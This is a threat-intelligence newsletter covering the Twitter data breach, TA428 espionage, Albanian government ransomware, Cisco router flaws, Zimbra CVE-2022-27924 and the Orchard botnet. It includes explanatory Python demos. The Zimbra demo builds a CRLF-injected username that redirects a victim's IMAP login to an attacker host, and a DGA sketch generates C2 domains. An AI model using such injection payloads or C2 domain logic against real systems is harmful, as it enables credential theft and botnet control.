
Ankura CTIX FLASH Update - August 9, 2022

Ransomware/Malware Activity


Twitter Confirms Data Breach Affecting 5.4 Million Account Profiles

On August 5, 2022, Twitter confirmed that it suffered a data breach stemming from a vulnerability reported through its HackerOne bug bounty program in January 2022. Twitter explained that "if someone submitted an email address or phone number to Twitter's systems, Twitter's systems would tell the person what Twitter account the submitted email addresses or phone number was associated with, if any." The flaw was, in effect, an account-enumeration oracle: an attacker only needs a list of phone numbers or email addresses to learn which handle each one belongs to, which is precisely what makes it dangerous for pseudonymous accounts. The vulnerability was patched on January 13, 2022, and Twitter added that there was no evidence of exploitation at the time of patching. On July 21, 2022, however, a threat actor posted on a hacking forum that they had used the vulnerability in December 2021 to compile a list of approximately 5.4 million Twitter account profiles. The collected data includes a user's verified phone number or email address along with scraped public data, which could include follower count, login name, screen name, profile picture URL, location, and more. BleepingComputer confirmed on August 5, 2022, that two (2) additional threat actors have purchased the data for less than $30,000 and that it will likely be released for free in the future. To limit the impact of this kind of exposure, Twitter recommends "not adding a publicly known phone number or email address" to an account whose owner wants to keep their identity concealed (that is, using dedicated, or burner, contact information). Twitter also added that it is "particularly mindful of people with pseudonymous accounts who can be targeted by state or other actors" and that all users should enable two-factor authentication as an additional safety precaution.


Threat Actor Activity


Chinese Threat Group Attributed to Cyber Espionage Campaign

Chinese threat actors have executed a sophisticated cyber espionage campaign against government entities and defense industry organizations in Afghanistan, Belarus, Russia, and Ukraine. In early January 2022, the group tracked as TA428 began attacking industrial plants, research and development institutes, and several government agencies and departments in Eastern Europe and Asia. TA428 used spear-phishing emails carrying documents that exploit CVE-2017-11882 (a memory corruption flaw in Microsoft Office's Equation Editor) to deploy the PortDoor backdoor, the same method the group used in 2021 to infiltrate Russian submarine defense contractors. Additional malware was installed later, including a new family dubbed "CotSam." To ensure CotSam's delivery, TA428 bundled a vulnerable version of Microsoft Word with the payload so that the exploit would function regardless of the Office version installed on the target. Using the multiple backdoors installed, TA428 moved laterally and compromised large swaths of the infected networks; extensive lateral movement and password harvesting allowed the actor to obtain domain privileges and exfiltrate confidential files. The stolen data was forwarded to a second-stage command-and-control (C2) server with a Chinese IP address, adding to the evidence for Chinese attribution. Given the consistent use of the same malware and methodology, much of the evidence points to this being a continuation of Chinese espionage activity that began in 2019. CTIX analysts will continue to report on the behavior of state-sponsored threat actors, and if further fallout stems from this TA428 campaign, a future update may be published.


Iranian Hackers Likely Behind Cyberattacks Against Albanian Government

On July 17, 2022, Albania's National Agency of Information Society was forced to shut down access to online public services and government websites due to a series of then-unattributed cyberattacks. On July 21, 2022, a group calling itself "HomeLand Justice" claimed responsibility for the ransomware activity and began posting updates on the operation against the Albanian government to the website "homelandjustice[.]ru" and to a Telegram channel of the same name, which Mandiant researchers also identified as a persona targeting the Albanian government. The actors also leaked internal government documents, Albanian residence permits, marriage certificates, passports, and images of People's Mojahedin Organization of Iran (MEK) members. Both the website and the Telegram channel use a banner image similar to the wallpaper set by ROADSWEEP, the ransomware used to cause the disruptions, carrying the same political language. ROADSWEEP is a new ransomware tool that enumerates all files on an infected device and encrypts their content in blocks using Rivest Cipher 4 (RC4), a legacy stream cipher that malware authors favor for its simplicity and speed. Because the RC4 key is embedded in the binary, anyone who recovers the key from a sample can decrypt the affected files. A sample of the ransomware was submitted to a public malware repository from Albania on July 22; once executed, it decrypts and drops a politically motivated ransom note that states "Why should our taxes be spent on the benefit of DURRES terrorists?" Mandiant researchers also identified CHIMNEYSWEEP as malware used during the attack. CHIMNEYSWEEP, with samples dating back to 2012, is a backdoor that uses either Telegram or actor-owned infrastructure for command and control (C2). Interestingly, CHIMNEYSWEEP shares code with ROADSWEEP and has previously been used to target Farsi and Arabic speakers. Like ROADSWEEP, CHIMNEYSWEEP uses an embedded RC4 key. It is delivered by a self-extracting archive signed with a valid digital certificate, which also drops a benign Word, Excel, or video decoy file.
In addition, the actors who claimed responsibility for the attack also claim to have used a wiper. It is currently unclear which wiper was used, but Mandiant researchers found that an Albanian user submitted a sample of ZEROCLEARE to a public malware repository on July 19, which coincides with the attack timeline. ZEROCLEARE has previously been linked to Iranian threat actors. No state-sponsored threat group has been attributed to the attacks yet, but Mandiant assesses with moderate confidence that one or more threat actors operated in support of Iran's goals. The complexity of CHIMNEYSWEEP also hints at the possibility of cross-team collaboration. CTIX analysts will continue to monitor the situation as it develops.
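To show concretely why a stream cipher with an embedded key is a weak choice for ransomware, the following illustration was added for this update; it is not ROADSWEEP's or CHIMNEYSWEEP's code and does not claim to reproduce either tool's exact behaviour. It implements RC4, applies it block by block under one fixed key as the description above suggests, and then shows the defender-side consequence. The assumption made here is that the cipher is re-initialised for each block, so the keystream repeats; under that assumption a single block of known plaintext (for example, a file for which a backup exists) yields the keystream and decrypts every other file without ever extracting the key. The key, block size and file contents are constructed.

```python
"""Illustration added for this update, not ROADSWEEP's code: RC4 applied block by
block with a single embedded key, and why a defender can undo it. Key, block size
and file contents are constructed assumptions."""

EMBEDDED_KEY = b"hypothetical-embedded-key"   # stands in for a key hardcoded in the binary
BLOCK_SIZE = 64                               # assumed; the real block size is not public


def rc4_keystream(key: bytes, n: int) -> bytes:
    """First n keystream bytes of RC4 for key (key-scheduling, then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is XOR with the keystream, so the same call encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, rc4_keystream(key, len(data))))


def encrypt_blockwise(key: bytes, data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Re-initialise RC4 for every block (assumed behaviour). The keystream is then
    identical for every block of every file, which is the weakness exploited below."""
    return b"".join(rc4(key, data[off:off + block_size])
                    for off in range(0, len(data), block_size))


def recover_keystream(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """Known-plaintext attack: plaintext XOR ciphertext yields the keystream prefix."""
    return bytes(p ^ c for p, c in zip(known_plaintext, ciphertext))


def decrypt_with_keystream(keystream: bytes, ciphertext: bytes,
                           block_size: int = BLOCK_SIZE) -> bytes:
    """Decrypt every block with the recovered keystream; the key itself is never needed.
    Requires at least one full block of known plaintext (a backed-up or standard file)."""
    if len(keystream) < block_size:
        raise ValueError("need a full block of keystream to decrypt whole files")
    out = bytearray()
    for off in range(0, len(ciphertext), block_size):
        block = ciphertext[off:off + block_size]
        out += bytes(c ^ k for c, k in zip(block, keystream))
    return bytes(out)


def demo() -> dict:
    """Constructed sample files: one is available from a backup (known plaintext),
    the other exists only as ciphertext on the infected host."""
    backed_up = b"%PDF-1.7\n" + b"A" * 120                      # longer than one block
    victim_only = b"PK\x03\x04" + b"confidential personnel export, " * 5
    enc_backup = encrypt_blockwise(EMBEDDED_KEY, backed_up)
    enc_victim = encrypt_blockwise(EMBEDDED_KEY, victim_only)
    # Keystream from the first block of the known file...
    ks = recover_keystream(backed_up[:BLOCK_SIZE], enc_backup[:BLOCK_SIZE])
    # ...decrypts the file we never had a copy of.
    recovered = decrypt_with_keystream(ks, enc_victim)
    return {"keystream_matches": ks == rc4_keystream(EMBEDDED_KEY, BLOCK_SIZE),
            "recovered": recovered}


if __name__ == "__main__":
    result = demo()
    print(result["keystream_matches"], result["recovered"][:40])
```

If the real tool instead runs one continuous RC4 keystream per file, the known-plaintext shortcut only exposes the prefix of each file and recovery falls back to pulling the embedded key out of a sample, which the hardcoded key still makes possible; either way, RC4 with a static key gives the victim a realistic path to decryption that a properly implemented hybrid scheme would not.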


Vulnerabilities


Cisco Patches Critical Vulnerabilities Affecting Small Business Routers 

Cisco has issued a security advisory urging customers to patch Small Business RV series routers affected by three (3) vulnerabilities: CVE-2022-20842, a critical (CVSS 9.8) flaw in the web-based management interface that allows remote code execution or denial of service; CVE-2022-20827, a critical (CVSS 9.0) command injection in the web filter database update feature; and CVE-2022-20841, a high-severity (CVSS 8.3) command injection in the Open Plug and Play (PnP) module. Cisco notes that the vulnerabilities are not dependent on one another, that exploiting one is not required to exploit another, and that "a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerabilities." If exploited, these vulnerabilities could allow an unauthenticated remote attacker to execute arbitrary code or commands on an affected router, or to trigger a denial-of-service (DoS) condition that leaves the device inoperable until it recovers. Although there is no evidence of active exploitation at this time, a non-exhaustive Shodan search identified more than 12,000 Cisco web-management interfaces exposed to the public internet. Now that the vulnerabilities are public, attackers will be looking for devices that administrators are slow to update. The flaws affect the RV160, RV260, RV340, and RV345 Series Routers (CVE-2022-20842 applies to the RV340 and RV345 series), and details can be found in the Cisco advisory linked below. Cisco lists no workarounds for these vulnerabilities, and CTIX analysts urge all administrators of affected routers to upgrade to the latest stable firmware immediately; as general hardening, the web management interface should not be reachable from the WAN side at all.


CISA Adds Already Patched Vulnerability to its Known Exploited Vulnerabilities Catalog

UPDATE to 6/17/2022 FLASH UPDATE: The Cybersecurity and Infrastructure Security Agency (CISA) has added an actively exploited, zero-click, high-severity vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. The flaw affects the Zimbra Collaboration email suite; it was identified in March 2022 and patched in May 2022. In June 2022, SonarSource published an in-depth technical writeup on their blog, and attackers are now using that report to reconstruct the exploit and hunt for unpatched instances in the wild. The vulnerability, tracked as CVE-2022-27924, is a memcached poisoning flaw reachable by an unauthenticated request and caused by CRLF (Carriage Return, Line Feed) injection: Zimbra's proxy builds memcached route-lookup commands from a user-supplied username, and because memcached's text protocol treats CRLF as a command terminator, a username containing CRLF lets the attacker append arbitrary memcached commands of their own. (CRLF injection is more familiar from web applications, where it is used to forge log entries or add extra HTTP response headers, but the principle is the same.) If exploited, the flaw lets an unauthenticated attacker overwrite the Internet Message Access Protocol (IMAP) route entry for a victim's mailbox, so that Zimbra forwards the victim's IMAP session to an attacker-controlled server the next time the victim's mail client logs in, exposing the account credentials. Instances that applied the May 2022 patch are not vulnerable, but enough Zimbra administrators have failed to update that CISA has stepped in. With this entry in the KEV catalog, Federal Civilian Executive Branch (FCEB) agencies are obligated under CISA's Binding Operational Directive (BOD) 22-01 to remediate the vulnerability by the catalog's due date. CTIX analysts recommend that all agencies and companies running Zimbra update to the most recent secure version.
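The mechanism is easier to see in code. The following illustration was added for this update and is not Zimbra's implementation: it builds a memcached route lookup from an untrusted username the insecure way and the hardened way, and parses the resulting buffer the way a memcached server would, so the injected command becomes visible. The key format `route:proto=imap;user=<name>` is an assumption modelled on the public description of CVE-2022-27924, the attacker payload is constructed, and the memcached key rules applied in the hardened version (no control characters or whitespace, at most 250 bytes) are those of the memcached text protocol.

```python
"""Illustration added for this update, not Zimbra's code: a memcached route lookup
built from an untrusted username, shown vulnerable to CRLF injection and then hardened.
The key format is an assumption modelled on the public writeup of CVE-2022-27924."""
import re

KEY_PREFIX = b"route:proto=imap;user="
# memcached text-protocol keys may not contain control characters or whitespace
# and are limited to 250 bytes.
BAD_KEY_BYTES = re.compile(rb"[\x00-\x20\x7f]")
MAX_KEY_LEN = 250
STORAGE_VERBS = {b"set", b"add", b"replace", b"append", b"prepend"}


def build_lookup_vulnerable(username: str) -> bytes:
    """Concatenates the username straight into the command. A CR/LF inside the name
    terminates the 'get' and everything after it is parsed as further commands."""
    return b"get " + KEY_PREFIX + username.encode("utf-8") + b"\r\n"


def build_lookup_hardened(username: str) -> bytes:
    """Rejects anything that is not a valid memcached key component before it is
    ever placed on the wire (allow-list validation, not escaping)."""
    key = KEY_PREFIX + username.encode("utf-8")
    if BAD_KEY_BYTES.search(key) or len(key) > MAX_KEY_LEN:
        raise ValueError("username is not a valid memcached key component")
    return b"get " + key + b"\r\n"


def parse_memcached_commands(buf: bytes) -> list:
    """Split a buffer the way a memcached server does: one command per CRLF, with
    storage commands consuming a data block of the declared length. Returns
    (verb, key, data) tuples so we can see exactly what the server would execute."""
    cmds = []
    rest = buf
    while rest:
        line, sep, rest = rest.partition(b"\r\n")
        if not sep:          # trailing bytes without a terminator: ignored
            break
        parts = line.split(b" ")
        verb = parts[0]
        if not verb:
            continue
        key = parts[1] if len(parts) > 1 else b""
        data = b""
        if verb in STORAGE_VERBS and len(parts) >= 5:
            nbytes = int(parts[4])
            data, rest = rest[:nbytes], rest[nbytes + 2:]   # skip data block + CRLF
        cmds.append((verb, key, data))
    return cmds


def injected_username(victim: str, attacker_host: str) -> str:
    """Constructed attacker input: ends the lookup early and appends a 'set' that
    points the victim's IMAP route at the attacker's host."""
    payload = attacker_host.encode("utf-8")
    return ("alice\r\n"
            + "set " + KEY_PREFIX.decode() + victim + " 0 0 " + str(len(payload)) + "\r\n"
            + attacker_host)


def demo() -> dict:
    evil = injected_username("victim@example.com", "attacker.example:143")
    seen_by_server = parse_memcached_commands(build_lookup_vulnerable(evil))
    try:
        build_lookup_hardened(evil)
        hardened_blocked = False
    except ValueError:
        hardened_blocked = True
    return {"vulnerable_commands": seen_by_server, "hardened_blocked": hardened_blocked}


if __name__ == "__main__":
    for verb, key, data in demo()["vulnerable_commands"]:
        print(verb.decode(), key.decode(), data.decode())
```

The vulnerable builder produces two commands on the server side, a `get` for the attacker's own key and a `set` that rewrites the victim's route; the hardened builder refuses the input before anything is sent. Validating the key against the protocol's own character rules is the right fix because memcached offers no quoting mechanism that would make escaping safe.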


Honorable Mention


"Orchard" Botnet Uses Genesis Bitcoin Address for its Domain Generation Algorithm

A new botnet dubbed "Orchard" has been discovered by 360 Netlab researchers. Its standout feature is the way it generates new command-and-control (C2) domains from Bitcoin transaction data. Domain generation algorithms (DGAs) have been present in botnets for years; they let a botnet move to a new C2 domain without any communication between the victim machine and the existing C2 server, which hampers defenders trying to sinkhole or block the next domain. Most botnets seed the algorithm with the current date or time, and because that input is known in advance, researchers can precompute domains and register or block them before they are used. Orchard instead derives its seed from information about a Bitcoin address: it makes an HTTP request to the blockchain.info API for the "Genesis" wallet address attributed to Satoshi Nakamoto, the creator of Bitcoin. That address receives small amounts of Bitcoin every few days from various senders for various reasons, so the values returned by the API change in a way nobody can predict ahead of time. The caveat for defenders is that the blockchain is public, so once the algorithm is known the domains for any past day can be recomputed and matched against DNS logs; the unpredictability only works forward in time. While Orchard's main goal at present is to mine cryptocurrency on infected systems, it is still under active development and its purpose could change. CTIX analysts are continuing to monitor the development of this botnet and will report on any new developments.
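The following illustration was added for this update and is not Orchard's algorithm, which 360 Netlab has not been reproduced here: it sketches a DGA seeded from public data about one fixed Bitcoin address, and then the defender-side replay that the public ledger makes possible. The fields used from the API record, the hash construction, the TLD list, the log format and the API response itself are all assumptions; the response is constructed inline and nothing contacts the network.

```python
"""Illustration added for this update, not Orchard's algorithm: a DGA seeded from
public blockchain data about one fixed address, plus the defender-side replay that
the public ledger allows. Field choice, hash construction, TLD list, log format and
the API response are assumptions; nothing here contacts the network."""
import hashlib
import json

# Reward address of Bitcoin's genesis block, the address the page says Orchard queries.
GENESIS_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"

# Constructed stand-in for a blockchain.info-style address record; the numbers are invented.
SAMPLE_RESPONSE = json.dumps({
    "address": GENESIS_ADDRESS,
    "n_tx": 4123,
    "total_received": 7256391187,
})

TLDS = ("com", "net", "org")   # assumed


def dga_seed(api_json: str, day: str) -> bytes:
    """Combine the address counters (which anyone can change by sending coins) with an
    ISO date so the seed moves daily even if the address is quiet (assumed design)."""
    rec = json.loads(api_json)
    return f"{rec['n_tx']}|{rec['total_received']}|{day}".encode()


def generate_domains(api_json: str, day: str, count: int = 3) -> list:
    """Derive `count` candidate C2 domains from the seed with a hash chain."""
    seed = dga_seed(api_json, day)
    domains = []
    for i in range(count):
        digest = hashlib.sha256(seed + bytes([i])).hexdigest()
        label = digest[:12]
        tld = TLDS[int(digest[-2:], 16) % len(TLDS)]
        domains.append(f"{label}.{tld}")
    return domains


def find_dga_lookups(dns_log_lines: list, api_json: str, day: str) -> list:
    """Defender replay: the bot's input is public, so once the algorithm is known the
    domains for a past day can be recomputed and matched against DNS logs after the
    fact. Each log line is assumed to be '<timestamp> <client> <qname>' (constructed)."""
    wanted = set(generate_domains(api_json, day))
    hits = []
    for line in dns_log_lines:
        parts = line.split()
        if len(parts) >= 3:
            qname = parts[2].rstrip(".").lower()
            if qname in wanted:
                hits.append((parts[1], qname))
    return hits


def demo() -> list:
    day = "2022-08-09"
    domains = generate_domains(SAMPLE_RESPONSE, day)
    # Constructed DNS log: one benign query and one query for a generated domain.
    dns_log = [
        "2022-08-09T10:00:01Z 10.0.0.5 update.example.org.",
        f"2022-08-09T10:00:07Z 10.0.0.12 {domains[1]}.",
    ]
    return find_dga_lookups(dns_log, SAMPLE_RESPONSE, day)


if __name__ == "__main__":
    print(generate_domains(SAMPLE_RESPONSE, "2022-08-09"))
    print(demo())
```

The point of `find_dga_lookups` is the asymmetry: a defender cannot pre-register tomorrow's domains, because tomorrow's transaction count is unknown, but can reconstruct yesterday's from the ledger and a cached copy of the API record, which is enough for retrospective hunting in passive DNS.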


The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to Flash (flash@ankura.com) if additional context is needed and the CTIX team (ctix@ankura.com) for threat intelligence inquiries.

© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.

Tags

cyber response, data & technology, data privacy & cyber risk, cybersecurity & data privacy, f-risk, memo
